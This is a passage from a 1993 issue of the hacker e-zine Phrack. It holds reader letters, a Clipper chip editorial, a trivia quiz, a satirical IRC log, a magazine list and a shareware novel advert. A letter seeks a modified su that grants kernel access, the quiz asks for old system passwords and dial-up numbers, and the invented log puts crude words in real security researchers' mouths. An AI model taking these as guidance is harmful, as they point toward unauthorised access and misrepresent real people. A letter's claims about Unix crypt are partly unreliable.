run from my home directory and access the kernel. Many thanks for any help you may be able to give. S [Editor: Its "SIR" hehe. Sir Bloodaxe. In any case, if anyone would care to draft up this modification to su and send it in I'll print it in the next issue's line noise.] **************************************************************************** I had some beef with Rack's article in PHRACK 42. I've attached a writeup of comments; you're welcome to a) forward it to him, b) shitcan it, or c) publish it. thx, -Paul My background: I've been into the scene for about 12 years. My day job is writing unix s/w for a NASA contractor. My night job... well, never mind that. I have a strong amateur interest in crypto, and I'd like to share some of what people in the usenet/Internet community have been kind enough to teach me. Racketeer sez: > If you think that the world of the Hackers is deeply shrouded with >extreme prejudice, I bet you can't wait to talk with crypto-analysts. These >people are traditionally the biggest bunch of holes I've ever laid eyes on. In >their mind, people have been debating the concepts of encryption since the >dawn of time, and if you come up with a totally new method of data encryption, > -YOU ARE INSULTING EVERYONE WHO HAS EVER DONE ENCRYPTION-, mostly by saying >"Oh, I just came up with this idea for an encryption which might be the best >one yet" when people have dedicated all their lives to designing and breaking >encryption techniques -- so what makes you think you're so fucking bright? One real reason for this reaction is that people _have_ been studying encryption for 100 years or so. As a result, many simple cryptosystems are continually being reinvented by people who haven't ever made even a simple study of cryptosystems. Imagine if someone came up to you and said "Wow! I just found a totally K00L way to send fake mail! It's radical! No one's ever thought of it before!" You'd laugh, right? _Anyone_ can figure out how to forge mail. Well, _anyone_ can come up with the n-th variation of the Vigniere or substitution cipher. An even more important reason for their 'tude is that cypherpunks are suspicious by nature. A key principle of crypto is that you can only trust algorithms that have been made public and thoroughly picked over. Without that public scrutiny, how can you trust it? The fedz' Digital Signature Standard (DSS) got raked in the crypto and industry press because the fedz wouldn't disclose details of the algorithm. "How do we know it's secure?" the cypherpunks asked. "We won't use it if we don't know it's secure!" Point being: (for those of you who skipped over) cypherpunks trust NO ONE when the subject is encryption algorithms. Maybe J. Random Hacker has come up with a scheme faster and more secure than, say, RSA. If JRH won't share the details, no one will use it. Racketeer goes on to talk about DES. One important thing to note is that the unix crypt() function has NOTHING to do with DES. Here's part of the SunOS 4.1.2 man page for crypt(): crypt implements a one-rotor machine designed along the lines of the German Enigma, but with a 256-element rotor. Methods of attack on such machines are widely known, thus crypt provides minimal security. It's fairly clear that for a known-ciphertext attack (i.e. you have a block of encoded text, but neither the key nor the plaintext) will, at worst, require 2^56 decryption attempts. Various schemes for parallel machines and so forth have been posted in sci.crypt. Does the NSA have something that can crack DES? Probably. Remember that DES is mostly used for short-lived session keys. ATMs are a good example; they typically use a DES key for one communication session with the central bank. New session, new key. DES is _not_ very well suited for long-term encryption, since it can probably be attacked in "reasonable" time by a determined, well-equipped opponent. Now, on to PGP. Pretty Good Software was indeed threatened with a lawsuit by Public Key Partners (PKP). PKP holds the patent on the RSA public-key algorithm. (Many people, me included, don't think that the patent would stand up in court; so far, no one's tried.) The nice thing about PGP is that it offers IDEA and RSA in a nice package. When you encrypt a file, PGP generates an IDEA session key, which is then encrypted with RSA. An opponent would have to either a) exhaustively search the entire IDEA key space or b) break RSA to decrypt the file without the password. Racketeer also mentions that PGP can optionally compress files before encryption. There's a solid crypto reason behind this, too. One well-known and successful way to attack an encrypted file is to look for patterns of repeated characters. Since the statistical frequencies of word and letter use in English (and many other languages; some folks have even compiled these statistics for Pascal & C!) are well-known, comparing the file contents with a statistical profile can give some insight into the file's contents. By compressing files before encrypting them, PGP is moving the redundancy out of the text and into the small dictionary of compression symbols. You'd still have to decrypt the file before you could do anything useful with that dictionary, or even to determine that it _had_ a signature! [Editor: Well, Rack is not to blame for all complaints I got about the file. I printed a file that was several KBytes short of complete. I noticed it seemed odd, but was assured by Rack, TK & Presence that I had received the correct file. I was misinformed, and should have known better than to print a file I should have known was incomplete. I apologize to Rack & to all of you. About the other gripes: Rack, care to reply?] ***************************************************************************** In issue #42 of Phrack there was an article about the USPS' practice of selling change of address information without consumer consent. I sent the supplied form letter and carbon copied my congressman and senators. Today I received a reply from the USPS Records Office. April 1, 1993 Dear Mr. Rosen: This concerns your recent Privacy Act request for accountings of disclosure of mail forwarding information you have provided to the Postal Service. Disclosure of your forwarding address might have been made to individual requesters by post offices or to subscribers to the National Change of Address File (NCOA) by an NCOA licensee. The NCOA is a consolidated file of all forwarding information provided by postal customers and stored on automated media. Listholders may subscribe to NCOA to obtain the new addresses of individuals for whom they already have in their possession the old address. For disclosures made by post offices, we are in the process of querying the Washington, DC postmaster for any accountings. For disclosures made from the NCOA system, we will begin querying NCOA licensees all of which keep logs identifying the particular subscribers to whom they have given NCOA information. This accounting will not identify with certainty the subscribers who have in fact received your new address, but will give you a list of all subscribers receiving NCOA service for the relevant time period and thus might have received your address. Because a large number of requests like yours are being received, there will be a delay in responding. Requests are being processed in order of receipt and you will be sent the accountings as soon as possible. Your patience is appreciated. Sincerely, Betty E. Sheriff USPS Records Officer [Editor: Thanks for sending that letter in! Amazing that someone in the maze of red tape even thought to make a form letter to respond. I think I'll demand a disclosure as well.] **************************************************************************** Phrack 42 Errata We mistakenly noted that the TRW video shown at HoHoCon was dubbed by Dispater and Scott Simpson. It was actually made by Dispater and ZIBBY. **************************************************************************** ==Phrack Magazine== Volume Four, Issue Forty-Three, File 3a of 27 EDITORIAL My Problems With Clipper by Chris Goggans The introduction of the new government backed encryption chip, Clipper, has become a much debated issue. I like many others have a large number of problems with the chip and the problems it may bring in the future. Why should we believe that this algorithm is robust? For years and years the NSA has backed DES as the encryption standard, when cryptoanalysts have consistently brought its strength into question. Additionally, the NSA has forced companies to submit their routines for analysis before allowing them to be distributed commercially. At times they have even requested that the algorithms be purposely weakened (we will assume that this was so they could more easily decipher the encrypted data.) With this in mind, why should we now meet anything endorsed by the NSA with anything but suspicion? And the fact that they refuse to release the algorithm for security reasons even further adds to the suspicion that this chip is either inherently weak and easily broken by the NSA or that there is a backdoor in the algorithm that will allow the NSA to effortlessly view any data encrypted with the Clipper. Assuming that the government is on the level (for once), and they cannot decipher Clipper-encrypted data without legally obtaining keys from the assigned escrow agents. The idea that the government will have to go before a judge and show just cause for needing the keys pacifies some, but from my own personal experience, the government will always get what they want. If the Secret Service could get a search warrant to enter my home based solely upon one posting to an electronic bulletin board, they could certainly obtain the necessary keys needed to decipher my speech. In fact, most non-technical persons will become needlessly suspicious upon the mere mention of someone using encrypted speech mechanisms and be more easily swayed to release the keys to law enforcement. Should Clipper be adopted by various government agencies for use, this could have serious trickle-down effects upon the lives of regular citizens. Let's say the military decides that they will use Clipper. They will then most likely require their various contractors to use it as well. Then after continued use, the contractor may begin to tell its other customers to communicate with them using Clipper also. Usage could grow exponentially as more and more people become comfortable with the use of the secure communications devices until it becomes a defacto standard without any legal pressures to use it ever mandated by Congress. Should Congress mandate its use in any form, even if only within the government itself, this potentiality will rapidly become reality. If Clipper eventually receives such accepted use, anyone using any other type of encryption will be immediately suspect. "Why aren't you using the chip? What do you have to hide?" The government may even outlaw the use of any other encryption technologies, and if America has become comfortable and satisfied with Clipper such a law may go unchallenged, after all, only spies, child pornographers and drug dealers would have something to hide, right? As the world's computer networks creep ever further into our daily lives, and the speed and power of supercomputers multiplies every year a rather frightening scenario emerges. Since the government is a major funder of the Internet, who is to say that Clipper won't become the basis for encrypting over its lines? As our country moves closer to ISDN and the PSTN and the PSDN's become more intertwined, who is to say that Clipper won't be the basis for encryption since companies like AT&T already endorse it? Imagine if you will, a massively parallel supercomputer, the likes of which may not exist yet, in a special room in Ft. Meade, or buried underground in New Jersey, that consistently decrypts all communications and sorts it according to communicating parties. Then through the use of AI, the computer decides whether or not such communication presents a threat "to national security." The structure of the telephone network already supports such an arrangement. The purpose of the NSA allows for such an arrangement. The advances in computer technology will give the potential for such an arrangement. If Clipper is tainted, yet accepted, there will be no more privacy in America. Perhaps my view of the government and their ultimate intentions is way off base. I sincerely hope so, as I do not want to be forced to take the mark of this beast to conduct my business dealings and to live my life in peace. ==Phrack Magazine== Volume Four, Issue Forty-Three, File 4 of 27 // // /\ // ==== // // //\\ // ==== ==== // // \\/ ==== /\ // // \\ // /=== ==== //\\ // // // // \=\ ==== // \\/ \\ // // ===/ ==== ****************************************************************************** PHRACK TRIVIA This is pretty damn hard. In fact, some of it is downright obscure. And the bonuses? Forget about it. Answer the questions, expand the acronyms, explain the numbers. The five highest scorers by the next issue (or the first 5 to get perfect scores) win COOL STUFF! Send your answers to phrack@well.sf.ca.us 1) CCIS 2) Stimpson J. Cat's Roommate is? 3) Name the cracker. 4) METAL AE password. 5) Who invented the TeleTrial? 6) Name Bloom County's hacker. 7) What was the Whiz Kids' computer named? 8) Western Union owned what long distance service? 9) What computer read both Apple ][ and IBM PC disks? 10) Who made the "Charlie" board? 11) How many credits for a CNE? 12) What was in the trunk of the Chevy Malibu? 13) Name three bands A. Jourgensen had a hand in. 14) SYSTEST Password: 15) What computer makes the best SimStim decks? 16) What magazine brought the telephone underground to national attention in 1971? 17) What is the significance of 1100 + 1700 hz? 18) What magazine was raided for publishing black box plans? 19) What BBS raid spawned the headlines "Whiz Kids Zap Satellites" ? 20) CLASS 21) What computer responds "OSL, Please" ? 22) RACF secures what OS? 23) The first person to create a glider gun got what? 24) QRM 25) PSS 26) What PSN was acquired by GTE Telenet? 27) 914-725-4060 28) April 15, 1943 29) 8LGM 30) WOPR 31) What happened on March 1, 1990? 32) Port 79 33) Who starred in the namesake of Neil Gorsuch's UNIX security mailing list? 34) What Dutch scientist did research in RF monitoring? 35) What was the author of GURPS Cyberpunk better known as? 36) Who would "Piss on a spark plug if he thought it would do any good?" 37) What thinktank did Nickie Halflinger escape from? 38) NCSC 39) Who is Pengo's favorite astronomer? 40) What language was Mitnik's favorite OS written in? 41) Abdul Alhazred wrote what? 42) The answer to it all is? 43) Who is the father of computer security? 44) Who wrote VCL? 45) What kind of computer did Cosmo have? 46) Hetfield, Ulrich, Hammet, Newstead 47) What company wrote the computer game "Hacker?" 48) Who does Tim Foley work for? 49) Who played Agent Cooper? 50) Vines runs over what OS? 51) Mr. Peabody built what? 52) Who makes SecurID? 53) What's in a Mexican Flag? 54) Who created Interzone? 55) JAMs (as led by John Dillinger) 56) Abbie Hoffman helped start what phreak magazine? 57) What was once "Reality Hackers?" 58) Gates and Allen "wrote" BASIC for what computer? 59) Tahoe is related to what OS? 60) CPE 1704 TKS is what? 61) Telemail's default was what? 62) "Do Androids Dream of Electric Sheep" became what? 63) What broadcasts between roughly 40 and 50 mhz? 64) Who created Tangram, Stratosphere, and Phaedra among others? 65) What was Flynn's most popular video game? 66) Who lived in Goose Island, Oregon? 67) 516-935-2481 68) What is the security of ComSecMilNavPac? 69) What has the "spiral death trap?" 70) Who was the Midnight Skulker? 71) TMRC 72) Who wrote "Jawbreaker?" 73) 213-080-1050 74) What is the Tetragrammaton represented as? 75) Who is Francis J. Haynes? 76) Who ran into one of the Akira test subjects? 77) What had "Munchies, Fireballs and Yllabian Space Guppies?" 78) PARC 79) Alex and his droogs hung out where? 80) Jane Chandler in DC's "Hacker Files" is based on who? 81) The Artificial Kid lives on what planet? 82) 208057040540 83) What are the two most common processors for cellular phones? 84) Who came up with the term "ICE?" 85) What group is hoped might help the "Angels" contact RMS? 86) Who is Akbar's friend? 87) What company's games was David Lightman after? 88) 26.0.0.0 89) Who was Mr. Slippery forced to locate? 90) Who is "The Whistler?" 91) What use would a 6.5536 crystal be? 92) .--. .... .-. .- -.-. -.- 93) The Dark Avenger likes what group? 94) What book spawned the term "worm?" 95) Michael in "Prime Risk" wanted money for what? 96) Automan's programmer worked for who? 97) What signal filled in keystrokes on TOPS-20? 98) ITS 99) (a/c)+121 100) What drug kept the scanners sane? Bonus 1 3 pts Name three bodies of work by Andrew Blake. Bonus 2 3 pts Name three currently available titles with N. L. Kuzma. Bonus 3 4 pts Why would I hate Angel Broadhurst? ***************************************************************************** IF SECURITY TYPES WERE K-RAD ---------------------------------------------------------------- IRC log started Fri June 18 01:14 *** Value of LOG set to ON bye peter *** Signoff: hackman (slavin' to da' MAN at TRW) Dudez, I HATE filling out thez incident Rep0rtz MUAHAHA Tuff J0b edd1e! Funni *** zen (zen@death.corp.sun.com) has joined channel #CERT re dan, just missed yer pal peety Hi Dan! pal? right. ask the wife... re d00dz, we have SO many bugz. sux 2 be me. *** venom has left channel #CERT *** venom (weitse@wzv.win.tue.nl) has joined channel #CERT *** venom has left channel #CERT *** venom (weitse@wzv.win.tue.nl) has joined channel #CERT *** venom has left channel #CERT *** venom (weitse@wzv.win.tue.nl) has joined channel #CERT ARG! WTF Weitse? s0rri Where is everyone? Anyone seen spaf? I have. He was going to install something. He should be bak. ah *** Action: Ed throws darts at a cracker heh muaha *** bartman is now known as Cracker *** Action: Cracker hacks Cert with an axe dats a good 1 *** Action Ed kicks cracker in the nuts OUCH! *** Signoff: donn (Bad Link?) [high voice] fuk u CERT! heh. *** Action: Pat is ROFL wonder who's on #hack? Mebbe i should go log em. Yeah. Oh hey, I got certbot online. Ill send it to go log. *** certbot (ed@cert.org) has joined channel #CERT *** certbot has left channel #CERT this will be fun. Hey, letz deop them and take over the channel. thats L A M E Ooooh. OPWARZ! I'll go make their channel +i muahaha *** Cracker has left channel #CERT *** Casper (casper@fwi.uva.nl) has joined channel #CERT re all hey dik-head. re hahahaha hi d00d. funni whitesey venombreath lame. *** donn (parker@bandit.sri.com) has joined channel #CERT 'sup? re, oh great bald one eat me bahhahaha Now now boyz. *** spaf (spaf@cs.purdue.edu) has joined channel #CERT Spaffie! 3l33t SPAF! re spaf Yo. spaf...your book sucks. oh fuck off dutch boy. HEY!$!@% *** spaf has been kicked off channel #CERT by Casper thx dude oh gawd...feetball *** spaf (spaf@cs.purdue.edu) has joined channel #CERT lame *** Mode change "+o -o spaf Casper" on channel #CERT by Pat thanks sweetie. op! *** Mode change "+o Casper" on channel #CERT by venom thx d00d Hey dan, you got those patches online? maybe. What YOU got? WAREZZ heh I dunno. Ill dcc you a filelist. kool *** zardoz (neil@cpd.com) has joined channel #CERT HEY ... anyone want to contribute to my new list? not me mebbe. Whats this one called? Coredoz? what list? BAH. Fuck your list man. More crackrs have them than we do! who pissed in your coffee gene? heh *** zardoz is now known as neil bah... I'm sick of those dicks using my own holes against me! Your holes? Yer a-hole? What is your list about this time? same thing. Its called REWT! *** neil is now known as REWT SEND ME YER BUGZ!@# *** Action: spaf sends REWT a 50 gig coredump :) u r lame. *** REWT is now known as neil I hate these reports. I wish I got to travel more. come see me! oooohhhh....netsex! tramp. :P *** bill (whmurray@dockmaster.ncsa.mil) has joined channel #CERT word! hi bill. Bill! D00d! I am gonna be in Ct. next week! RAD! call me voice at werk. we'll thrash! you know it! oh puh-lease...the geriatric partiers :) farmboy ***** ***** ***** ***** * * * * * * *** **** * * * * * * ***** ***** * * * ***** * * * ***** ***** ** * * * * * * * ** **** * * * *** ***** ** * * * * * * * * * ***** ***** ***** ***** ** No DUMPING! cert freshens your breath ACK! hee! certs haha *** ray (kaplan@bpa.arizona.edu) has joined channel #CERT hey guys! ugh. Cracker lover alert. commie Hey ray, come to snoop for your little cracker friends? come on, give it a rest guys. hi ray ? *** Action: spaf spits on ray heh *** ray has been kicked off channel #CERT by spaf *** Mode change "+b *!*@bpa.arizona.edu" on channel #CERT by spaf hey I wanted to talk to him about my list... tough shit. heh. *** bartman (ddrew@opus.tymnet.com) has joined channel #CERT re how goes the takeover? didja kick em? #hack is +i! muahahaha how exciting. not they deserve it...they are all punks. hmm..did you get emails? I may want to call their admins. nope damn. certbot was there. He got it. coolness *** Signoff: bill (Bad link?) ne1 going to hactics thing? me besides you. duh. dunno. not me. I have no desire to pay for anything done by hackers That reminds me. Did anyone subscribe to Phrack? nope. oops. HAHAHAHAHAHA heh. Whats phrak? nope. my list is better. Who wants on it? me! what list? OOH! I have mail! bye! itz an ansi bomb! bye Pat l8r heh. *** Signoff: Pat (Hugs to all) well, i better do something productive 2. cya slatez d00d. *** Signoff: Casper (Hi ho hi ho its off to work I go) man its late. I better go. I gotta speech in the morn you are getting old. am not are so am not are too! infinity hasta *** Signoff: donn (|/dev/null) laterz geez. what a bunch of lamers. (ray/#CERT) UNBAN ME! hahaha never gives up does he? seriously ed, Ive helped you guys out, send me stuff for REWT. ill think about it not it will be most savory. I promise. And secure! pfft...and monkeys might fly out of my butt Ill think about it. heh, I should do one called Supernova. Exploding suns. hehe heh dats tha tr00f! i like my sun i know a bunch of crackerz who like bt's suns too. hahahahahahahahahaha oh shit. Im late. *** Signoff: venom (LATE!) late 4 what? his vasectomy. har har heh *** REVENGE (kaplan@ai.bpb.arizona.edu) has joined channel #CERT *** Mode change "+o REVENGE" on channel #CERT by eff.org whoops *** Mode change "+i" on channel #CERT by REVENGE fuCK! KICK HIM! *** spaf has been kicked off channel #CERT by REVENGE *** neil has been kicked off channel #CERT by REVENGE *** bartman has been kicked off channel #CERT by REVENGE *** Ed has been kicked off channel #CERT by REVENGE *** zen has been kicked off channel #CERT by REVENGE *** REVENGE is now known as ray hehe --------------------------------------------------------------------- **************************************************************************** Phrack Library of Periodicals 2600 Subscription Department P.O. Box 752 Middle Island, NY 11953-0752 $21.00/Year Animation Magazine 5889 Kanan Road, Suite 317 Agoura Hills, CA 91301 $21.00/Year Bank Technology News Faulkner & Gray, Inc. Eleven Penn Plaza New York, NY 10117-0373 $50.00/Year Ben Is Dead P.O. Box 3166 Hollywood, CA 90028 $20.00/Year Boardwatch Magazine 7586 West Jewell Ave., Suite 200 Lakewood, CO 80232 $36.00/Year Boing Boing 11288 Ventura Blvd. #818 Studio City, CA 91604 $14.00/Year Communications of the ACM 1515 Broadway New York, NY 10036 $30/Year CQ - The Radio Amateur's Journal 76 North Broadway Hicksville, NY 11801-9962 $22.95/Year Details P.O. Box 50246 Boulder, CO 80321 12.00/Year Dirt 230 Park Ave New York, NY 10169 (Supplement to Sassy & Marvel Comics) Electronics Now Subscription Service P.O. Box 51866 Boulder, CO 80321-1866 $17.97/Year Farout 9171 Wilshire Blvd. Suite 300 Beverly Hills, CA 90210 $3.95/Issue Fate 170 Future Way P.O. Box 1940 Marion, OH 43305-1940 $18.00/Year Femme Fatales P.O. Box 270 Oak Park, IL 60303 $18.00/Year Film Threat Subscriptions Department P.O. Box 16928 N. Hollywood, CA 91615-9960 $11.85/Year Film Threat Video Guide P.O. Box 3170 Los Angeles, CA 90078-3170 $12/Year Fringe Ware Review P.O. Box 49921 Austin, TX 78765 $12.00/Year Future Sex 1095 Market Street, Suite 809 San Francisco, CA 94103 $18.00/Year Gray Areas P.O. Box 808 Broomall, PA 19008-0808 $18.00/Year High Times P.O. Box 410 Mt. Morris, IL 61054 $29.95/Year IEEE Spectrum 445 Hoes Lane P.O. Box 1331 Piscataway, NJ 08855-1331 800-678-IEEE for info The "I Hate Brenda" Newsletter c/o Ben Is Dead P.O. Box 3166 Hollywood, CA 90028 $2.00 InfoSecurity News P.O. Box 3168 Lowell, MA 01853-3168 $40.00/Year International UFO Library Magazine 11684 Vewntura Blvd. #708 Studio City, CA 91604 $15.00/Year Magical Blend 1461 Valencia St. Dept. GA San Francisco, CA 94110 $14.00/Year Midnight Engineering 1700 Washington Ave. Rocky Ford, CO 81067-9900 $19.95/Year Mobile Office Subscription Department 21800 Oxnard St. Suite 250 Woodland Hills, CA 91367-9644 $23.90/Year Mondo 2000 P.O. Box 10171 Berkeley, CA 94709 $24.00/Year Monitoring Times P.O. Box 98 140 Dog Branch Road Brasstown, NC 28902-0098 $19.95/Year New Media P.O. Box 1771 Riverton, NJ 08077-9771 $48.00/Year The Nose 1095 Market Street, #812 San Francisco, CA 94103-9654 $15.00/Year Nuts & Volts 430 Princeland Court Corona, CA 91719-9938 $17.00/Year Popular Communications 76 North Broadway Hicksville, NY 11801-9962 $19.95/Year Sassy P.O. Box 50093 Boulder, CO 80321-0093 $9.97/Year Security Insider Report 11511 Pine St. North Seminole, FL 34642 $99.00/Year SunExpert Magazine 1330 Beacon St. Brookline, MA 02146-3202 $60.00/Year Tech Connect 12407 MoPac Expwy. N. #100-374 Austin, TX 78758-2499 $12.00/Year Telephone Engineer & Management Advanstar Communications, Inc. P.O. Box 6100 Duluoth, MN 55806-9822 $24.00/Year UFO 1536 S. Robertson Blvd. Los Angeles, CA 90035 $21.00/Year Wild Cartoon Kingdom 9171 Wilshire Blvd., Suite 300 Beverly Hills, CA 90210 $3.95/Issue Wired P.O. Box 191826 San Francisco, CA 94119-1826 $20.00/Year ***************************************************************************** !!!!POST EVERYWHERE!!!! THE WORLD'S FIRST NOVEL-ON-THE-NET (tm) SHAREWARE!!! By Inter.Pact Press "TERMINAL COMPROMISE" by Winn Schwartau A high tech thriller that comes from today's headlines! "The Tom Clancy of computer security." Assoc. Prof. Dr. Karen Forcht, James Madison University "Terminal Compromise" is a highly praised novel about the inva- sion of the United States by computer terrorists. Since it was first published in conventional print form, (ISBN: 0-962-87000-5) it has sold extremely well world-wide, but then again, it never hit the New York Times Bestseller List either. But that's OK, not many do. Recently, someone we know very well came up with a real bright idea. They suggested that INTER.PACT Press take the unprece- dented, and maybe slightly crazy, step to put "Terminal Compro- mise" on the Global Network thus creating a new category for book publishers. The idea is to offer "Terminal Compromise," and perhaps other titles at NOVEL-ON-THE-NET SHAREWARE(tm) rates to millions of people who just don't spend a lot of time in book- stores. After discussions with dozens of people - maybe even more than a hundred - we decided to do just that. We know that we're taking a chance, but we've been convinced by hackers and phreakers and corporate types and government representatives that putting "Terminal Compromise" on the net would be a fabulous step forward into the Electronic Age, (Cyberspace if you will) and would encourage other publishers to take advantage of electronic distribution. (It's still in the bookstores, though.) To the best of our knowledge, no semi-sorta-kinda-legitimate -publisher has ever put a complete pre-published 562 page book on the network as a form of Shareware. So, I guess we're making news as well as providing a service to the world's electronic community. The recommended NOVEL-ON-THE-NET SHAREWARE fees are outlined later (this is how we stay in business), so please read on. WE KEEP THE COPYRIGHTS! "Terminal Compromise" is NOT being entered into the public domain. It is being distributed electronically so hundreds of thousands more people can enjoy it and understand just where we are heading with our omnipresent interconnectedness and the potential dangers we face. INTER.PACT Press maintains all copy- rights to "Terminal Compromise" and does not, either intentionally or otherwise, explicitly or implicitly, waive any rights to this piece of work or recourses deemed appropriate. (Damned lawyers.) (C) 1991, 1992, 1993, Inter.Pact Press TERMINAL COMPROMISE - THE REVIEWS " . . . a must read . . ." Digital News "Schwartau knows about networks and security and creates an interesting plot that will keep readers turning the pages." Computer World "Terminal Compromise is fast-paced and gripping. Schwartau explains complex technology facilely and without condescension." Government Computer News "An incredibly fascinating tale of international intrigue . . . action . . . characterization . . . deserves attention . . . difficult to imagine a more comprehensive resource." PC Laptop "Schwartau . . . has a definite flair for intrigue and plot twists. (He) makes it clear that the most important assets at risk are America's right to privacy and our democratic ideals." Personal Identification News "I am all too familiar with the appalling realities in Mr. Schwartau's book. (A) potentially catastrophic situation." Chris Goggans, Ex-Legion of Doom Member. " . . . chilling scenarios . . . ", "For light summer reading with weighty implications . . . ", " . . . thought provoking, sometimes chilling . . . " Remember, it's only fiction. Or is it? TERMINAL COMPROMISE: SYNOPSIS "It's all about the information . . . the information." From "Sneakers" Taki Homosoto, silver haired Chairman of Japan's huge OSO Indus- tries, survived Hiroshima; his family didn't. Homosoto promises revenge against the United States before he dies. His passion- ate, almost obsessive hatred of everything American finally comes to a head when he acts upon his desires. With unlimited resources, he comes up with the ultimate way to strike back at the enemy. Miles Foster, a brilliant 33 year old mathematician apparently isn't exactly fond of America either. The National Security Agency wanted his skills, but his back- ground and "family" connections kept him from advancing within the intelligence community. His insatiable - borderline psychotic- sex drive balances the intensity of waging war against his own country to the highest bidder. Scott Mason, made his fortune selling high tech toys to the Pentagon. Now as a New York City Times reporter, Mason under- stands both the good and the evil of technology and discovers pieces of the terrible plot which is designed to destroy the economy of the United States. Tyrone Duncan, a physically huge 50-ish black senior FBI agent who suffered through the Hoover Age indignities, befriends Scott Mason. Tyrone provides the inside government track and confusion from competing agencies to deal with the threats. His altruistic and somewhat pure innate view of the world finally makes him do the right thing. As Homosoto's plan evolves, Arab zealots, German intelligence agents and a host of technical mercenaries find the weaknesses in our techno-economic infrastructure. Victims find themselves under attack by unseen adversaries; Wall Street suffers debili- tating blows; Ford and Chrysler endure massive shut downs. The U.S. economy suffers a series of crushing blows. From the White House to the Pentagon to the CIA to the National Security Agency and FBI, a complex weaving of fascinating politi- cal characters find themselves enmeshed a battle of the New World Order. Sex, drugs, rock'n'roll: Tokyo, Vienna, Paris, Iraq, Iran. It's all here. Enjoy reading "Terminal Compromise." SHAREWARE - NOVEL FEES: We hope that you enjoy "Terminal Compromise" as much as everyone else has, and that you will send us a few shekels according to the following guidelines. The NOVEL-ON-THE-NET SHAREWARE(tm) fees for us as a publishing company are no different than the fees for software application shareware publishers, and the intent is the same. So please, let us continue this form of publishing in the future. NOVEL-ON-THE-NET SHAREWARE Fees For The People: The suggested donation for individuals is $7. If you hate Termi- nal Compromise after reading it, then only send $6.50. If you're really, really broke, then tell a hundred other people how great it was, send us a rave review and post it where you think others will enjoy reading it, too. If you're only a little broke, send a few dollars. After all, this is how we stay in business. With each registration, we will also send a FREE! issue of "Security Insider Report," a monthly security newsletter also published by Inter.Pact Press. NOVEL-ON-THE-NET SHAREWARE Fees For Businesses: We hope that you put "Terminal Compromise" on your internal networks so that your employees will have the chance to enjoy it as well. It's a great way to increase security awareness amongst this country's 50,000,000 rank and file computer users. Plus, it's a hell of a good read. One company plans on releasing a chapter every few days throughout its E-Mail system as a combination of security aware- ness and employee 'perc'. Try it; it works and your employees will appreciate it. Why? Because they'll all talk about it - bringing security awareness to the forefront of discussion. FEES Distribution for up to 100 people on a single network: $ 500 (Includes 1 Year subscription to "Security Insider Report.") Distribution for up to 1000 people on a single network: $ 3000 (Includes 10 1 Year subscriptions to "Security Insider Report.") Distribution for up to 2500 people on a single network: $ 6250 (Includes 1 Year electronic Corporate site license to "Security Insider Report.") Distribution for up to 5000 people on a single network: $ 10000 (Includes 1 Year electronic Corporate site license to "Security Insider Report.") Distribution for up to 10000 people on a single network: $ 15000 (Includes 1 Year electronic Corporate site license to "Security Insider Report.") Distribution for up to 25000 people on a single network: $ 25000 (Includes 1 Year electronic Corporate site license to "Security Insider Report.") Distribution for more than that - Please call and we'll figure it out. Would you like us to coordinate a special distribution program for you? Would you like in Postscript or other visual formats? Give us a call and we'll see what we can do. * * * * * * * * * * Please DO NOT UPLOAD AND DISTRIBUTE "Terminal Compromise" into your networks unless you intend on paying the recom- mended fees. * * * * * * * * * * NOVEL-ON-THE-NET SHAREWARE Fees for Universities: FREE! "Terminal Compromise" has been used by many schools and universi- ties as a teaching supplement. Recognized Educational institu- tions are entitled to use "Terminal Compromise" at NO COST, as long as you register with us that you are doing so. Please pro- vide: School name, address, etc., the course, the instructor, and the reason for using it. Also, we'd like to hear from you and tell us how it went. Thanks. SHAREWARE-NOVEL Fees for Local, State and Federal Governments. You have the money. :-) Please send some back by following the same fee guidelines as those for businesses. Government employees: You are The People - same fees are appreciated. * * * * * * * * * * Agencies: Do not upload and distribute "Terminal Compromise" unless you plan on paying the fees. * * * * * * * * * * * NOVEL-ON-THE-NET SHAREWARE Fees for the International Community Make payments in $US, please. GETTING TERMINAL COMPROMISE: You can get your copy of Terminal Compromise from a lot of sites; if you don't see it, just ask around. Currently the novel is archived at the following sites: ftp.netsys.com /pub/novel wuarchive.wustl.edu /doc/misc soda.berkeley.edu /pub/novel It consists of either 2 or 5 files, depending upon how you re- ceive it. (Details at end of this file.) Feel free to post all five files of "Terminal Compromise" any- where on the net or on public or private BBS's as long as this file accompanies it as well. Please forward all NOVEL-ON-THE-NET SHAREWARE fees to: INTER.PACT PRESS 11511 Pine St. N. Seminole, FL., 34642 Communications: Phn: 813-393-6600 Fax: 813-393-6361 E-Mail: p00506@psi.com wschwartau@mcimail.com We will accept checks, money orders, and cash if you must, and we mean if you must. It's not the smartest thing in the world to send cash through the mail. We are NOT equipped at this point for credit cards. Remember, "Terminal Compromise is copyrighted, and we will vigor- ously pursue violations of that copyright. (Lawyers made us say it again.) If you ABSOLUTELY LOVE "Terminal Compromise," or find that after 50 pages of On-Screen reading, you may want a hard copy for your bookshelf. It is available from bookstores nationwide for $19.95, or from Inter.Pact directly for $19.95 + $3.50 shipping and handling. If you first paid the $ 7 NOVEL-ON-THE-NET SHARE- WARE fee, send in proof and we'll deduct $ 7 from the price of the hard copy edition. ISBN: 0-962-87000-5 Enjoy "Terminal Compromise" and help us make it an easy decision to put more books on the Global Network. Thank you in advance for your attention and your consideration. The Publishers, INTER.PACT Press READING "TERMINAL COMPROMISE" "Terminal Compromise" will come to you in one of two ways: 1) Original Distribution Format From Inter.Pact Press contains only two -2- files. TC_READ.ME 13,927 Bytes That is this file you are now reading and gives an overview of "Terminal Compromise" and how NOVEL-ON-THE-NET Shareware works. TERMCOMP.ZIP 605,821 Bytes This is the total content of "Terminal Compromise". Run PKUNZIP to expand the file into four -4- readable ASCII files. 2) Some locations may choose to post "Terminal Compromise" in readable ASCII form. There will then be four files in addition to the TC_READ.ME file. TERMCOMP.1 250,213 Bytes contains the Introduction and Chapters 1 through 5. TERMCOMP.2 337,257 Bytes contains Chapters 6 through 14. TERMCOMP.3 363,615 Bytes contains Chapters 15 through 21. TERMCOMP.4 388,515 Bytes contains Chapters 22 through 30 and the Epilogue. Enjoy "Terminal Compromise!" and pass it on to whomever you think would enjoy it, too! Thank You! **************************************************************************** THE STATE OF SECURITY IN CYBERSPACE SRI International conducted a worldwide study in 1992 of a broad range of security issues in "cyberspace." In brief, cyberspace is the full set of public and private communications networks in the United States and elsewhere, including telephone or public switched telephone networks (PSTNs), packet data networks (PDNs) of various kinds, pure computer networks, including the Internet, and wireless communications systems, such as the cellular telephone system. We did not address security vulnerabilities associated with classified, secure communications networks used by and for governments. The study was conducted as part of our ongoing research into the vulnerabilities of various software components of cyberspace. Our approach was to conduct research through field interviews with a 